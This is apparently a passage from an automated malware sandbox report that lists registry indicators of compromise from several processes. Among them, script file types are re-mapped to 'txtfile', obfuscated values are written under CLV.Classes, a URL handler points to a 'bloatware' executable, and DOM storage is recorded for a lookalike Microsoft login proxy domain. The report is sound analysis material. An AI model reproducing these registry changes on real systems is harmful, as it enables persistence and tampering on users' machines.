Explorer\International\Scripts\5\IEPropFontName = "Times New Roman" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "197" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\12\IEFixedFontName = "Raavi" reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\18\IEFixedFontName = "Kartika" reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25 reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "6" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "197" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39 reg.exe Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\33\IEFixedFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\35 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\36\IEFixedFontName = "Myanmar Text" reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main 3.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2DE5A861-D4C8-11EF-97FC-EA7747D117E6} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\23\IEFixedFontName = "GulimChe" reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\International\Scripts\6\IEFixedFontName = "Courier New" reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage\https-login--microsoftonline--com.httpsproxy.net IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28 reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18 reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DOMStorage\https-login--microsoftonline--com.httpsproxy.net\ = "0" IEXPLORE.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe -
Modifies registry class 57 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com1 = "33472D0B9D5583226D4476D577212CAB7D8064DC" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com3 = "2EC1B058449739EC53CFBAA53298D7C9" jaffa.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\psiphon\shell 3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" 1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" dxwbwewlne.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\psiphon\URL Protocol 3.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat dxwbwewlne.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSH\ = "txtfile" dxwbwewlne.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\psiphon 3.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\psiphon\shell\open\command 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter64.ax" regsvr32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc dxwbwewlne.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc\ = "txtfile" dxwbwewlne.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\CLV.Classes jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com2 = "6ACFF9B1FE11F2E584083A32819F3EE2B38D03FD4311033FE2BE429D08A2" jaffa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs dxwbwewlne.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg dxwbwewlne.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\psiphon\shell\open 3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com4 = "7FF8FF8D4F5B85189131D65D7E9CBC95E637583666456344D6E9" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSF\ = "txtfile" dxwbwewlne.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" dxwbwewlne.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\psiphon\ = "URL:psiphon" 3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} 1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" dxwbwewlne.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter32.ax" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom1 = "E7806BB9FE1C22D9D27ED0A48A7C9161" jaffa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsh dxwbwewlne.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsf dxwbwewlne.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\\bloatware\\3.exe\" -- \"%1\"" 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" 1.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} 1.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom2 = "1945C60F1591DAB1B9BD7FE2EDE234CF" jaffa.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd psiphon-tunnel-core.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a insdrv.exe Set value (data) 